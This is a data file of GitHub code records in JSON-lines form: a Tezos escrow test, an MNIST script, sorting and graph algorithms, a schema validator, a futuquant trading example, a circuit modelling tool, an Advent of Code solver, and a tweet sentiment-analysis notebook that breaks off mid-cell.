admin.address)\r\n    scenario += c1\r\n    c1.addBalanceOwner().run(sender = alice, amount = sp.tez(50))\r\n    c1.addBalanceCounterparty().run(sender = bob, amount = sp.tez(4))\r\n    scenario.h3(\"Erroneous secret\")\r\n    c1.claimCounterparty(secret = sp.bytes(\"0x01223343\")).run(sender = bob, valid = False)\r\n    scenario.h3(\"Correct secret\")\r\n    c1.claimCounterparty(secret = sp.bytes(\"0x01223344\")).run(sender = bob)\r\n\r\nsp.add_compilation_target(\"escrow\", Escrow(sp.address(\"tz1cqPT2LkjD8LhXMiW8fKzFTkqTUrcgznNN\"), sp.tez(50),\r\n sp.address(\"tz1UbYuXW4sAczjvMzrgTM96vp2NHhsxqu77\"), sp.tez(4),\r\n sp.timestamp(1712479881), sp.bytes(\"0xc2e588e23a6c8b8192da64af45b7b603ac420aefd57cc1570682350154e9c04e\"),\r\n sp.address(\"tz1cftYcJt2rQydsbCDCP19zTpqeztLauFBM\")))\r\n","repo_name":"KristineNunez/Mini-Project-2","sub_path":"contract/Revised_Escrow.py","file_name":"Revised_Escrow.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70866245970","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport scipy.misc\n\nprint(tf.__version__)\n\n\n\nmnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nimg = x_train[1]\nprint(img.shape)\nprint(type(img))# image type\nprint(img.dtype)# data type\nprint(img.shape)# image size\nscipy.misc.imsave('im.jpg', img)# save the image\n\nplt.figure()\nplt.imshow(x_train[1])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n\nimg = scipy.misc.imread('test.jpeg',mode='RGB')\n \nprint(img.shape)\nprint(type(img))# image type\nprint(img.dtype)# data type\nprint(img.shape)# image size\n \nplt.figure(1)\nplt.imshow(img)\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n#img_tensor = tf.image.decode_image(img)\n#img_tensor = tf.image.decode_jpeg(img_tensor, channels=3)\n#img_tensor = tf.image.resize(img_tensor, [28, 28])\n#img_tensor /= 255.0 # normalize to [0,1] range\n#\n#\n#scipy.misc.imsave('process.jpg', img_tensor)# save the image","repo_name":"asysbang/tensorflow","sub_path":"handwriting/myhand.py","file_name":"myhand.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15396719709","text":"\n\ndef insertionSort2(arr):\n    n = len(arr)  # Get the length of the array\n    \n    if n <= 1:\n        return  # If the array has 0 or 1 element, it is already sorted, so return\n    \n    for i in range(1, n):  # Iterate over the array starting from the second element\n        key = arr[i]  # Store the current element as the key to be inserted in the right position\n        j = i-1\n        while j >= 0 and key < arr[j]:  # Move elements greater than key one position ahead\n            arr[j+1] = arr[j]  # Shift elements to the right\n            j -= 1\n        arr[j+1] = key  # Insert the key in the correct position\n\ndef merge_sort(values):\n\n    k = 9\n\n    if len(values) <= k:\n        print(\"whoop\")\n        print (len(values))\n        insertionSort2(values)\n        return values\n\n    mid = len(values) // 2\n\n    left_values = merge_sort(values[:mid])\n\n    right_values = merge_sort(values[mid:])\n\n    l = []\n\n    i = 0\n\n    j = 0\n\n    while i < len(left_values) and j < len(right_values):\n\n        if left_values[i] < right_values[j]:\n            l.append(left_values[i])\n            i += 1\n\n        else:\n            l.append(right_values[j])\n            j += 1\n\n    l += left_values[i:]\n    l += right_values[j:]\n\n    return l\n\n\nnewList = 
[5,3,1,2,6,4,9,7,8,10,61,55,33,45,86,32,14,57,87,99,55,30,22,66,88]\n\nprint(newList)\n\nprint(merge_sort(newList))","repo_name":"add33m/d0012e","sub_path":"lab1/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15659817922","text":"from schema import Schema, And, Or, Regex\n\nfrom validations.schemas.base_schema import BaseSchema\n\n\nclass CoursesSchema(BaseSchema):\n SCHEMA = Schema([{\n 'id': str,\n 'code': Or(And(str, BaseSchema.COURSE_CODE_LAMBDA), None), # course code should be a string and of length 8\n 'name': str,\n 'description': Or(str, None),\n 'division': str,\n 'department': str,\n 'prerequisites': Or(str, None),\n 'corequisites': Or(str, None),\n 'exclusions': Or(str, None),\n 'recommended_preparation': Or(str, None),\n 'level': Regex(r'^\\d00(/(A|B|C|D))?$'),\n 'campus': Or(*BaseSchema.VALID_CAMPUSES),\n 'term': str,\n 'arts_and_science_breadth': Or(str, None),\n 'arts_and_science_distribution': Or(str, None),\n 'utm_distribution': Or(str, None),\n 'utsc_breadth': Or(str, None),\n 'apsc_electives': Or(str, None),\n 'meeting_sections': [{\n 'code': str,\n 'instructors': Schema([str]),\n 'times': [{\n 'day': str,\n 'start': int,\n 'end': int,\n 'duration': int,\n 'location': Or(str, None)\n }],\n 'size': int,\n 'enrollment': Or(int, None),\n 'waitlist_option': bool,\n 'delivery': str\n }],\n 'last_updated': str\n }])\n","repo_name":"nikel-api/nikel-parser","sub_path":"validations/schemas/courses_schema.py","file_name":"courses_schema.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"22949760966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExamples for use the python functions: get push data\n\"\"\"\nfrom futuquant.open_context import *\n\nclass USOrderPushHandler(USTradeOrderHandlerBase):\n \"\"\"\n 美股定单\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(USOrderPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"USOrderPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"USOrderPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass USDealPushHandler(USTradeDealHandlerBase):\n \"\"\"\n 美股成交推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(USDealPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"USDealPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"USDealPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass HKOrderPushHandler(HKTradeOrderHandlerBase):\n \"\"\"\n 港股定单状态推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(HKOrderPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"HKOrderPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"HKOrderPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass HKDealPushHandler(HKTradeDealHandlerBase):\n \"\"\"\n 港股成交推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(HKDealPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"HKDealPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"HKDealPushHandler\\n\", content)\n return RET_OK, content\n\nif __name__ == \"__main__\":\n api_ip = '127.0.0.1' # 
''119.29.141.202'\n api_port = 11111\n unlock_pwd = '979899'\n\n '''\n # 港股模拟环境下单及推送\n trade_context = OpenHKTradeContext(host=api_ip, port=api_port)\n trade_context.unlock_trade(unlock_pwd)\n trade_context.set_handler(HKOrderPushHandler())\n trade_context.set_handler(HKDealPushHandler())\n trade_context.start()\n\n # print('\\nHK position_list_query:\\n')\n # print(trade_context.position_list_query(strcode='', stocktype='',\n # pl_ratio_min='', pl_ratio_max='', envtype=1))\n\n # print(trade_context.position_list_query(strcode='', stocktype='',\n # pl_ratio_min='', pl_ratio_max='', envtype=1))\n\n # print('\\nHK history_order_list_query:\\n')\n # print(trade_context.history_order_list_query(statusfilter='2,3', strcode='',\n # start='2017-10-01', end='2017-11-31', envtype=1))\n\n # print('\\nHK order_list_query:\\n')\n # print(trade_context.order_list_query(orderid='', statusfilter='', strcode='',\n # start='09:30:00', end='24:00:00', envtype=1))\n\n # print('\\nHK history_deal_list_query:\\n')\n # print(trade_context.history_deal_list_query(strcode='', start='2017-10-01', end='2017-11-31', envtype=1))\n\n # print('\\nHK deal_list_query:\\n')\n # print(trade_context.deal_list_query(envtype=1))\n\n print('\\nHK place_order:')\n orderid_list = [] # ['836204', '836195'] # 传空表示定阅全部订单\n trade_context.subscribe_order_deal_push(orderid_list, True, envtype=1)\n # print(trade_context.place_order(price=4.50, qty=1000, strcode='HK.03883', orderside=0, ordertype=0, envtype=1,\n # order_deal_push=False))\n print(trade_context.place_order(price=11.31, qty=1000, strcode='HK.01357', orderside=0, ordertype=0, envtype=1,\n order_deal_push=True, price_mode=PriceRegularMode.UPPER))\n '''\n\n #'''\n #美股正式环境下单及推送\n trade_context = OpenUSTradeContext(host=api_ip, port=api_port)\n print(trade_context.unlock_trade(unlock_pwd))\n trade_context.set_handler(USOrderPushHandler())\n trade_context.set_handler(USDealPushHandler())\n trade_context.start()\n\n # print('\\nUS position_list_query:\\n')\n # print(trade_context.position_list_query(strcode='', stocktype='STOCK',\n # pl_ratio_min='-20.5', pl_ratio_max='0', envtype=0))\n\n # print('\\nUS. history_order_list_query:\\n')\n # print(trade_context.history_order_list_query(statusfilter='', strcode='', start='2017-10-01', end='2017-11-31', envtype=0))\n\n # print('\\nUS. order_list_query:\\n')\n # print(trade_context.order_list_query(statusfilter='', strcode='US.MIN', start='', end='', envtype=0))\n\n # print('\\nUS. history_deal_list_query:\\n')\n # print(trade_context.history_deal_list_query(strcode='', start='2017-10-01', end='2017-11-31', envtype=0))\n # print('\\nUS. 
deal_list_query:\\n')\n # print(trade_context.deal_list_query(envtype=0))\n\n # trade_context.subscribe_order_deal_push('', True, 0)\n # print('\\nUS place_order:')\n print(trade_context.place_order(price=\"3.55\", qty=1, strcode='US.MIN', orderside=0, ordertype=2, envtype=0, order_deal_push=True, price_mode=PriceRegularMode.LOWER))\n # '''\n","repo_name":"dongxiao999999/futuquant","sub_path":"futuquant/examples/trade_order_push.py","file_name":"trade_order_push.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"72693915730","text":"import sys, heapq\n\ndef find_set(x):\n if p[x] == x:\n return x\n else:\n return find_set(p[x])\n\ndef union(a, b):\n p_a = find_set(a)\n p_b = find_set(b)\n p[p_b] = p_a\n\nN = int(sys.stdin.readline())\narr = [list(map(float, sys.stdin.readline().split())) for _ in range(N)]\np = [_ for _ in range(N)]\ndata = []\nfor i in range(N):\n for j in range(N):\n if i != j:\n a = arr[i]\n b = arr[j]\n dist = round(((a[0]-b[0])**2+(a[1]-b[1])**2)**0.5, 2)\n heapq.heappush(data, (dist, i, j))\n\ndef kruskal(data):\n ans = 0\n while data:\n w, s, e = heapq.heappop(data)\n if find_set(s) == find_set(e):\n continue\n ans += w\n union(s, e)\n return ans\n\nprint(kruskal(data))","repo_name":"Im-sy/Algorithm","sub_path":"BOJ/bj_4386.py","file_name":"bj_4386.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4416801452","text":"# coding: utf-8\nimport unittest\n\nfrom problems.fizz_buzz import Solution\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test(self):\n test_data = [\n {'n': 1, 'expected': ['1', ]},\n {'n': 15, 'expected': ['1', '2', 'Fizz', '4', 'Buzz', 'Fizz', '7', '8', 'Fizz', 'Buzz', '11', 'Fizz', '13', '14', 'FizzBuzz']},\n {'n': 31, 'expected': ['1', '2', 'Fizz', '4', 'Buzz', 'Fizz', '7', '8', 'Fizz', 'Buzz', '11', 'Fizz', '13', '14', 'FizzBuzz', '16', '17', 'Fizz', '19', 'Buzz', 'Fizz', '22', '23', 'Fizz', 'Buzz', '26', 'Fizz', '28', '29', 'FizzBuzz', '31']},\n {'n': 0, 'expected': []},\n {'n': -15, 'expected': []},\n ]\n for data in test_data:\n n = data['n']\n expected = data['expected']\n with self.subTest(n=n):\n self.assertEqual(list(self.solution.fizzBuzz(n)), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"problems/tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"26590428485","text":"#!/usr/bin/env python\n# 2016 (C) Valentin Lukyanets, SCSm-16-1\n\n\nfrom __future__ import print_function\nimport argparse\nimport re\nimport modeling\n\n\ndef read_input_data(filename):\n scheme_re = re.compile(r'^Scheme: (\\d+) lines; input (\\S+); output (\\S+); assert (\\S+)', re.IGNORECASE)\n truthtable_header_re = re.compile(r'^Truthtable \"(.+)\": (\\d+) inputs, (\\d+) outputs, (\\d+) lines', re.IGNORECASE)\n truthtable_line_re = re.compile(r'^(\\S+) (\\S+)')\n element_re = re.compile(r'^Element \"(.+)\": \"(.+)\"; in (\\S+); out (\\S+)', re.IGNORECASE)\n vectors_re = re.compile(r'^Vectors: (\\S+)', re.IGNORECASE)\n\n f = open(filename, \"r\")\n circuit = None\n vectors = []\n assertions = []\n truthtable = None\n inside_truthtable = False\n lines_left = 0\n for line in f:\n match = 
scheme_re.search(line)\n if match and not inside_truthtable:\n lines_count, inputs, outputs, asserts = int(match.group(1)), match.group(2), match.group(3), match.group(4)\n input_lines = [int(x) for x in inputs.split(\",\")]\n output_lines = [int(x) for x in outputs.split(\",\")]\n assert_lines = [int(x) for x in asserts.split(\",\")]\n\n circuit = modeling.Circuit(lines_count, input_lines, output_lines, assert_lines)\n continue\n\n match = element_re.search(line)\n if match and not inside_truthtable:\n element_name, truthtable_name, inputs, outputs = [match.group(i + 1) for i in range(4)]\n truthtable = circuit.truthtable_storage[truthtable_name]\n input_lines = [int(x) for x in inputs.split(\",\")]\n output_lines = [int(x) for x in outputs.split(\",\")]\n element = modeling.Element(element_name, truthtable, input_lines, output_lines, circuit)\n circuit.elements[element_name] = element\n continue\n\n match = vectors_re.search(line)\n if match and not inside_truthtable:\n vectors_str = match.group(1)\n vectors_str_list = vectors_str.split(\";\")\n vectors = [[modeling.logic_value_from_str(c) for c in s.split(\",\")[0]] for s in vectors_str_list]\n assertions = [[modeling.logic_value_from_str(c) for c in s.split(\",\")[1]] for s in vectors_str_list]\n continue\n\n match = truthtable_header_re.search(line)\n if match and not inside_truthtable:\n name = match.group(1)\n inputs, outputs, lines = [int(match.group(i + 2)) for i in range(3)]\n truthtable = modeling.Truthtable(name, inputs, outputs)\n lines_left = lines\n inside_truthtable = True\n continue\n\n match = truthtable_line_re.search(line)\n if match and inside_truthtable:\n input_terms_str, output_terms_str = match.group(1), match.group(2)\n input_terms = [modeling.logic_value_from_str(s) for s in input_terms_str]\n output_terms = [modeling.logic_value_from_str(s) for s in output_terms_str]\n truthtable += modeling.TruthtableLine(input_terms, output_terms)\n lines_left -= 1\n if lines_left == 0:\n inside_truthtable = False\n circuit.truthtable_storage[truthtable.name] = truthtable\n continue\n\n f.close()\n return circuit, vectors, assertions\n\n\ndef print_faults(f, tests, assertions_lines_count, assertions, faults, assertion_lines_avail,\n activation_matrix, func_matrix, result_faults):\n print(\"Faults table\", file=f)\n for test in range(tests):\n out1 = \"\".join([modeling.fault_modeling_value_to_str(value) for value in faults[test]])\n out2 = \"\".join([modeling.logic_value_to_str(value) for value in assertions[test]])\n out = \" \".join([out1, out2])\n print(out, file=f)\n\n print(\"Assertion lines\", file=f)\n for i in range(assertions_lines_count):\n out = \"\".join([modeling.logic_value_to_str(value) for value in assertion_lines_avail[i]])\n print(out, file=f)\n\n print(\"Activation matrix\", file=f)\n for i in range(tests):\n out = \"\".join([modeling.logic_value_to_str(value) for value in activation_matrix[i]])\n print(out, file=f)\n\n print(\"Functional matrix\", file=f)\n for i in range(tests):\n out = \"\".join([modeling.fault_modeling_value_to_str(value) for value in func_matrix[i]])\n print(out, file=f)\n\n print(\"Detected faults\", file=f)\n out = \", \".join(['{}-{}'.format(fault[0], modeling.fault_modeling_value_to_str(fault[1]))\n for fault in result_faults])\n print(out, file=f)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Modeling of circuits\")\n parser.add_argument(\"-i\", \"--input\", metavar=\"inputfile\", type=str, help=\"Input file name\")\n parser.add_argument(\"-o\", \"--output\", 
metavar=\"outputfile\", type=str, help=\"Output file name\")\n args = parser.parse_args()\n input_filename = args.input\n output_filename = args.output\n\n circuit, vectors, assertions = read_input_data(input_filename)\n circuit.prepare()\n\n try:\n f = open(output_filename, \"w\")\n faults, assertion_lines_avail, activation_matrix, func_matrix, result_faults =\\\n circuit.modeling_faults(vectors, assertions)\n print_faults(f, len(vectors), len(circuit.assert_lines), assertions, faults,\n assertion_lines_avail, activation_matrix, func_matrix, result_faults)\n f.close()\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n main()\nelse:\n print(\"This module shouldn't be imported!\")\n","repo_name":"vlukyanets/quantum-calculations","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41512326396","text":"import time\nimport os\nfrom typing import List\n\nUSE_LOGGING = False\nUSE_DEMO = False\nPART_ONE = False\n\nclass MyFile:\n def __init__(self, size: int, name: str):\n self.Size = size\n self.Name = name\n\n def print(self):\n print()\n\nclass MyDirectory:\n def __init__(self, name: str, parent):\n self.Name = name\n self.Parent: MyDirectory = parent\n self.Children: List[MyDirectory] = []\n self.Files: List[MyFile] = []\n self.Depth = 0 if parent is None else parent.Depth + 1\n self.Size = 0\n\n def print(self):\n print(\"% s% s - % s\" % ((\"\\t\"*self.Depth),self.Name,self.Size))\n for f in self.Files: print(\"% s% s - % s\" % ((\"\\t\"*(self.Depth+1)),f.Name, f.Size))\n for c in self.Children: c.print()\n\n def calcSize(self):\n for child in self.Children: child.calcSize()\n self.Size = sum(f.Size for f in self.Files) + sum(d.Size for d in self.Children)\n\nROOT = MyDirectory(\"/\", None)\n\ndef getInput(fileName):\n file = open(fileName, 'r')\n input = [x.strip().split(\" \") for x in file.readlines()]\n\n if USE_LOGGING: print(input)\n\n return input\n\ndef readTerminal(terminal):\n currentDirectory = ROOT\n \n for line in terminal: \n if line[0] == \"$\":\n if USE_LOGGING: print(\"Command\")\n\n if line[1] == \"cd\":\n if line[2] == \"/\":\n if USE_LOGGING: print(\"\\tChange Directory to Root\")\n currentDirectory = ROOT #redundant so far, but better to be complete\n elif line[2] == \"..\":\n if USE_LOGGING: print(\"\\tChange Directory to Parent\")\n\n if currentDirectory.Parent is None: raise Exception(\"Can't cd to parent, there isn't one. Current Directory is \", currentDirectory.Name)\n else: currentDirectory = currentDirectory.Parent\n else:\n if USE_LOGGING: print(\"\\tChange Directory to \", line[2])\n childDirectory = next(filter(lambda d: d.Name == line[2], currentDirectory.Children), None)\n\n if childDirectory is None: raise Exception(\"Can't cd to child, it wasn't found. 
Current Directory is \", currentDirectory.Name)\n else: currentDirectory = childDirectory\n\n elif line[1] == \"ls\":\n if USE_LOGGING: print(\"\\tls\")\n #I don't think I actually need to do anything with this\n\n elif line[0] == \"dir\":\n if USE_LOGGING: print(\"Directory \", line[1])\n currentDirectory.Children.append(MyDirectory(line[1], currentDirectory))\n else: #file\n if USE_LOGGING: print(\"File % s (% s)\" % (line[1], line[0]))\n currentDirectory.Files.append(MyFile(int(line[0]), line[1]))\n\ndef getSmallDirSum(myDirectory: MyDirectory, targetSize: int):\n sum = myDirectory.Size if myDirectory.Size <= targetSize else 0\n\n for child in myDirectory.Children:\n sum += getSmallDirSum(child, targetSize)\n\n return sum\n\ndef getSmallestDeleteCandidate(myDirectory: MyDirectory, targetSize: int):\n smallestOption = myDirectory.Size if myDirectory.Size > targetSize else 0\n\n for child in myDirectory.Children:\n smallestChild = getSmallestDeleteCandidate(child, targetSize)\n if smallestChild > 0 and smallestChild < smallestOption: smallestOption = smallestChild\n\n return smallestOption\n\n\n#start of main\nsolution = 0\ntotalSize = 70000000\nunusedSpaceTarget = 30000000\n\nstartTime = time.time()\n\nfile = 'example.txt' if USE_DEMO else 'input1.txt'\n\nterminal = getInput(file)\nreadTerminal(terminal)\nROOT.calcSize()\nif USE_LOGGING: ROOT.print()\n\nfreeSpace = totalSize - ROOT.Size\n\nsolution = getSmallDirSum(ROOT, 100000) if PART_ONE else getSmallestDeleteCandidate(ROOT, unusedSpaceTarget - freeSpace)\n\nendtime = time.time()\nprint('Solution: ', solution)\nprint ('Completion time: ', endtime - startTime)","repo_name":"TheoreticalHybrid/AdventOfCode","sub_path":"2022/Day_07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29445731675","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[41]:\n\n\n# Importing necessary libraries\n\n# For data manipulation\nimport re\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport glob\n\n# For EDA and visualization\nimport seaborn as sns\nsns.set(rc={'figure.figsize': (20,10)})\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.figure_factory as ff\n\n\n# For pre-processing text\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom better_profanity import profanity\nprofanity.load_censor_words()\n\n# For other output and NLP utilities\nfrom bokeh.plotting import figure\nfrom bokeh.io import output_file, show, output_notebook\nfrom collections import Counter\nimport spacy\nfrom spacy.util import compounding\nfrom spacy.util import minibatch\nfrom spacy import displacy\nimport gc\nimport os\nimport urllib\nimport csv\nfrom tqdm import tqdm\n\n# For modelling and sentiment analysis\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport torch\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom scipy.special import softmax\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom 
sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import confusion_matrix, classification_report\n\n\n# # Data preparation\n\n# ## Dataset initialization\n# \n# #### Note: the total dataset size is 17 GB and cannot be processed without a GPU so for the sake of demonstration, we will use a subset of the data\n\n# In[2]:\n\n\n# Loading all CSV files from the data/ folder\nl = [pd.read_csv(filename, index_col=0, compression='gzip', low_memory=False) for filename in glob.glob(\"../data/input/*.gzip\")]\n\n# Combining all CSV files into a single dataframe\ndf = pd.concat(l, axis=0)\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# ## Data cleaning\n\n# In[4]:\n\n\ndf.shape\n\n\n# In[5]:\n\n\n# Checking column datatypes\ndf.info()\n\n\n# In[6]:\n\n\n# Checking for empty values\ndf.isna().sum().sort_values(ascending=False)\n\n\n# In[7]:\n\n\n# Removing profanity from tweet texts\n# df['text'] = df['text'].apply(lambda x: profanity.censor(x))\n\n\n# #### Since one of the steps in our EDA process is to check tweets by location, we need to handle empty location values\n\n# In[8]:\n\n\n# Handling NaN values for location\ndf = df.dropna(subset=['location'])\n\n\n# # EDA\n\n# ### Tweets by language\n\n# In[9]:\n\n\n# Getting top 5 languages for tweets\ndf.language.value_counts()[:5]\n\n\n# In[10]:\n\n\n# Plotting barplot for visualization\nfig = sns.barplot(x=df.language.value_counts()[:5].index, y=df.language.value_counts()[:5])\nfig.set(title='Tweets by langauge', xlabel='Language', ylabel='Tweet count (order of 10)')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/tweets_by_language.png', bbox_inches='tight')\n\n\n# #### For sentiment analysis, we will only be using tweets in English\n\n# In[11]:\n\n\n# Extracting all tweets in English language\ndf_en = df[df.language == 'en'].drop('language', axis=1)\n\n\n# #### We will sort the tweets based on retweet count to judge for popularity\n\n# In[12]:\n\n\n# Sorting tweets based on retweet count\nsorted_tweets = df_en[['username', 'text', 'retweetcount', 'tweetid']].sort_values(by='retweetcount', ascending=False).reset_index()\n\n# Getting top 10 most retweeted tweets\nsorted_tweets[['username', 'text']].head(10)\n\n\n# ### Conversation topics and most used words\n\n# In[13]:\n\n\n# Building stopwords set\nstopwords_set = set(STOPWORDS)\nstopwords_set = set(stopwords.words('english'))\n\n\n# In[14]:\n\n\n# Generating word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42)\nwordcloud.generate(str(df_en['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/top_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# #### Since a few tweets were retweeted too many times, it seems like a better idea to build a word cloud from only unique tweets\n\n# In[15]:\n\n\n# Getting unique tweets\nunique_tweets = df_en.drop_duplicates(subset=['text'])\n\n# Building word cloud\nwordcloud= WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42\n ).generate(str(unique_tweets.sort_values(by='retweetcount').iloc[:20]['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/top_unique_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# ### Tweets by location\n\n# In[16]:\n\n\n# Plotting barplot for visualization\nfig = 
df_en.location.value_counts()[:10].plot.bar()\nfig.set(title='Tweets by location', xlabel='Location', ylabel='Location count')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/tweets_by_location.png', bbox_inches='tight')\n\n\n# ### One of the points discussed during the project proposal was to check for tweets by new accounts and check for possible propaganda\n\n# #### Let's extract tweets by newest accounts and check how the wordcloud changes\n\n# In[17]:\n\n\ntime_cols = ['extractedts', 'tweetcreatedts', 'usercreatedts']\n\n# Converting \"user account created time\" column to datetime\ndf_en['usercreatedts'] = pd.to_datetime(df_en['usercreatedts'])\n\n# Sorting by youngest user account age\nsort_by_userage= df_en.sort_values(by='usercreatedts', ascending=True)\n\n\n# In[18]:\n\n\n# Getting columns\ncolumns = df_en.columns.to_list()\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42\n ).generate(str(sort_by_userage.iloc[:1000, columns.index('text')]))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/newest_accounts_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# # Sentiment analysis\n# \n\n# #### Note: due to computation limitations, we will be using only the first 10000 rows for demonstration purposes\n\n# In[123]:\n\n\n# Building dataframe for sentiment analysis\nsentiment_df = df_en[['text']].iloc[:10000]\n\nsentiment_df.head()\n\n\n# ### We will be using RoBERTa for sentiment analysis\n# #### Note: we will be using the CPU as our local machine does not have an NVIDIA GPU\n\n# In[124]:\n\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\n\n# In[125]:\n\n\n# Initializing tokenizer\ntokenizer = AutoTokenizer.from_pretrained('cardiffnlp/twitter-roberta-base-sentiment')\n\n# Initializing model\nmodel = AutoModelForSequenceClassification.from_pretrained('cardiffnlp/twitter-roberta-base-sentiment').to(device)\n\n# Assigning sentiment labels\nlabels = ['negative', 'neutral', 'positive']\n\n\n# In[126]:\n\n\n# Setting batch size\nBATCH_SIZE = 10\n\n# Getting sentiment scores for tweet texts\nscores_all = np.empty((0, len(labels)))\ntext_all = sentiment_df['text'].to_list()\nn = len(text_all)\nwith torch.no_grad():\n for start_idx in tqdm(range(0, n, BATCH_SIZE)):\n end_idx = min(start_idx + BATCH_SIZE, n)\n encoded_input = tokenizer(text_all[start_idx:end_idx], return_tensors='pt', padding=True, truncation=True).to(device)\n output = model(**encoded_input)\n scores = output[0].detach().cpu().numpy()\n scores = softmax(scores, axis=1)\n scores_all = np.concatenate((scores_all, scores), axis=0)\n del encoded_input, output, scores\n torch.cuda.empty_cache()\n\n# Saving scores to sentiment dataframe\nsentiment_df['negative'] = [i[0] for i in scores_all]\nsentiment_df['neutral'] = [i[1] for i in scores_all]\nsentiment_df['positive'] = [i[2] for i in scores_all]\n\n\n# In[127]:\n\n\nsentiment_df.head()\n\n\n# # Emotion detection\n\n# In[128]:\n\n\n# Initializing tokenizer\nemotion_tokenizer = AutoTokenizer.from_pretrained(\"cardiffnlp/twitter-roberta-base-emotion\")\n\n# Initializing model\nemotion_model = AutoModelForSequenceClassification.from_pretrained(\"cardiffnlp/twitter-roberta-base-emotion\").to(device)\n\n# Assigning sentiment labels\nlabels = ['anger', 'joy', 'optimism', 'sadness']\n\n\n# In[129]:\n\n\n# Setting batch size\nBATCH_SIZE = 10\n\n# Getting emotion scores for 
